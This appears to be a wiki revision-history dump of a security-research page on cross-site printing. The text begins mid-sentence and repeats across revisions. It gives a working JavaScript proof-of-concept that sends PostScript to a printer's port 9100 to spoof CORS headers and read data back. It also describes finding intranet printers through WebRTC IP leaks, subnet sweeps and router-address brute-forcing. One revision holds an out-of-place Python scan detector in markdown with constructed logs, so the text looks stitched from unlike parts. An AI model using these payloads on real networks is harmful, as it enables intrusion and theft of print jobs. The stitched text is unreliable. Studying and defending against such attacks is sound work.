Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |- ! Channel !! Port !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || 9100 || - || ✔ || ✔ || - |- | Web || 80 || ✔ || - || - || - |- | IPP || 631 || ✔ || - || ✔ || - |- | LPD || 515 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op |- | FTP || 21 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. 
WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. 
<span style="color:red">Update: To prevent cross-site printing, port 9100/tcp may be blocked in future releases of Firefox <ref>''[https://bugzilla.mozilla.org/show_bug.cgi?id=1335688 Bug 1335688 - Cross-Site Printing (XSP) and CORS Bugzilla@Mozilla, 2017</ref> and Chrome <ref>''[https://bugs.chromium.org/p/chromium/issues/detail?id=687530 Issue 687530 - Security: Cross-Site Printing (XSP) and CORS Spoofing]'', Chromium Bug Tracker, 2017</ref>.</span> → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- 342fb1c12a57ca715d0b5f19f1fd65157726f4c1 616 611 2017-03-24T11:08:28Z Admin 1 /* Proof-of-concept */ wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. 
A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a hole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. 
A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. 
If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. 
Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |- ! Channel !! Port !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || 9100 || - || ✔ || ✔ || - |- | Web || 80 || ✔ || - || - || - |- | IPP || 631 || ✔ || - || ✔ || - |- | LPD || 515 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op |- | FTP || 21 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. 
== Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. <span style="color:red">Update: To prevent cross-site printing, port 9100/tcp may be blocked in future releases of Firefox <ref>''[https://bugzilla.mozilla.org/show_bug.cgi?id=1335688 Bug 1335688 - Cross-Site Printing (XSP) and CORS Bugzilla@Mozilla, 2017</ref> and Chrome <ref>''[https://bugs.chromium.org/p/chromium/issues/detail?id=687530 Issue 687530 - Security: Cross-Site Printing (XSP) and CORS Spoofing]'', Chromium Bug Tracker, 2017</ref>.</span> → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- b0d6c108ae04ee3f24fd9ba03c824210a92ff5a4 611 315 2017-02-24T15:47:32Z Admin 1 Added port numbers wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. 
In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a hole into the same-origin policy. 
A schematic overview of the attack is given below:

[[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]]

In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response, which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snippet is shown below:

<syntaxhighlight lang="javascript">
// Print job: a UEL, then a PostScript program that writes a fake HTTP/1.0
// response (with a permissive CORS header) followed by the printer's product
// name, then a closing UEL. The "\\n" sequences are PostScript string escapes.
var job = "\x1B%-12345X\r\n" +
          "%!\r\n" +
          "(HTTP/1.0 200 OK\\n) print\r\n" +
          "(Server: PostScript HTTPD\\n) print\r\n" +
          "(Access-Control-Allow-Origin: *\\n) print\r\n" +
          "(Connection: close\\n) print\r\n" +
          "(Content-Length: ) print\r\n" +
          "product dup length dup string cvs print\r\n" +  // body length = length of the product name
          "(\\n\\n) print\r\n" +                              // blank line ends the HTTP header
          "print\r\n" +                                       // body: the product name
          "(\\n) print flush\r\n" +
          "\x1B%-12345X\r\n";
// Cross-origin XHR POST to the raw printing port; because of the spoofed CORS
// header the browser hands the printer's response text back to the script.
var x = new XMLHttpRequest();
x.open("POST", "http://printer:9100");
x.onreadystatechange = function() {
  if (x.readyState == 4) alert(x.responseText);
};
x.send(job);
</syntaxhighlight>

== Limitations of cross-site printing ==

Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because it unfortunately prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header, and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results of PJL commands.

Two implementation pitfalls deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be returned needs to be determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding is not an option either, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important; otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time.

If the printer device supports plain text printing, the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and thereby, under some circumstances, the ability to disable printing functionality – until the HTTP body is processed, by which time the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]], using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all of these protocols could successfully be used to deploy print jobs with variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref>, they have some drawbacks beyond not providing feedback via spoofed CORS headers:

* Cross-protocol access to LPD and FTP ports is blocked by various web browsers
* Parameters for direct printing over the embedded web server are model-specific
* The IPP standard requires the <code>Content-Type</code> of HTTP POST requests to be set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref>, which cannot be done with XHR objects – it is however up to the implementation whether incorrect types are actually rejected

A comparison of cross-site printing channels is given below:

{| class="wikitable" style="text-align:center"
|-
! Channel !! Port !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by
|-
| Raw || 9100 || - || ✔ || ✔ || -
|-
| Web || 80 || ✔ || - || - || -
|-
| IPP || 631 || ✔ || - || ✔ || -
|-
| LPD || 515 || ✔ || - || ✔ || style="text-align:left;" | FF, Ch, Op
|-
| FTP || 21 || ✔ || - || ✔ || style="text-align:left;" | FF, Ch, Op, IE
|}

One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref>, which is implemented in most modern browsers and offers a feature to enumerate the IP addresses of local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing, which only takes seconds in our tests. If the printer is on the same subnet as the victim's host, its address can thus be detected solely using JavaScript.
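The discovery step just described is the part of XSP that is visible on the network: the WebRTC address leak happens entirely inside the browser, but the subsequent burst of XHR connections to 9100/tcp across the subnet comes from the victim's own workstation and shows up in firewall or flow logs as one host touching dozens of addresses on the same port within seconds. The following Python detector is an added example, not code from this wiki or its proof-of-concept; the flow-log line format and the sample lines are constructed, and the thresholds (20 distinct targets inside a 10-second window) are assumed tuning values.

```python
"""Detect the XSP discovery step on the network: one host opening connections to
many distinct addresses on 9100/tcp within seconds.

Added example, not code from the wiki or its proof-of-concept. The flow-log line
format, the sample lines and the thresholds are constructed/assumed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOG_LINE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+) proto=tcp$"
)


def parse_flow_log(text):
    """Parse constructed firewall-style flow lines into (timestamp, src, dst, dport)."""
    flows = []
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # skip lines in another format instead of failing the whole run
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        flows.append((ts, m["src"], m["dst"], int(m["dport"])))
    return flows


def detect_printer_sweeps(flows, port=9100, min_targets=20, window_seconds=10):
    """Return one alert per source that reached >= min_targets distinct hosts on `port`
    inside some sliding window of `window_seconds`. A legitimate workstation talks to
    one or two printers; a sweep touches most of the subnet."""
    window = timedelta(seconds=window_seconds)
    by_src = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport == port:
            by_src[src].append((ts, dst))
    alerts = []
    for src, events in by_src.items():
        events.sort()
        start, best = 0, 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, len({dst for _, dst in events[start:end + 1]}))
        if best >= min_targets:
            alerts.append({"src": src, "port": port, "distinct_targets": best})
    return alerts


def sample_log():
    """Constructed log: the browser on 10.0.0.23 sweeps 10.0.0.1-10.0.0.60 on 9100/tcp
    within three seconds, while 10.0.0.50 prints normally and browses the router."""
    base = datetime(2017, 2, 24, 10, 0, 0)
    lines = [
        "2017-02-24T10:00:00Z src=10.0.0.50 dst=10.0.0.200 dport=9100 proto=tcp",
        "2017-02-24T10:00:02Z src=10.0.0.50 dst=10.0.0.1 dport=80 proto=tcp",
    ]
    for i in range(1, 61):
        ts = base + timedelta(seconds=i // 20)
        lines.append(f"{ts:%Y-%m-%dT%H:%M:%S}Z src=10.0.0.23 dst=10.0.0.{i} dport=9100 proto=tcp")
    lines.append("2017-02-24T10:05:00Z src=10.0.0.50 dst=10.0.0.200 dport=9100 proto=tcp")
    return "\n".join(lines)


SAMPLE_LOG = sample_log()

if __name__ == "__main__":
    print(detect_printer_sweeps(parse_flow_log(SAMPLE_LOG)))
```

A hit names the workstation whose browser is running the page, not an outside attacker host, so the follow-up is to find the URL that was open there (the same URL that, as noted above, appears in the <code>Origin</code> header on any plain-text printout).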
WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: we try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before.

== Proof-of-concept ==

A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network, meaning XSP requests never reach the intranet printer.

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]]
A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. 
Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. 
Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Channel !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || - || ✔ || ✔ || - |- | Web || ✔ || - || - || - |- | IPP || ✔ || - || ✔ || - |- | LPD || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op |- | FTP || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. 
WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- cb809fc1c7db99ede287e1b0c7baf10dd4304869 279 276 2017-01-28T16:47:54Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. 
In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. 
A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. 
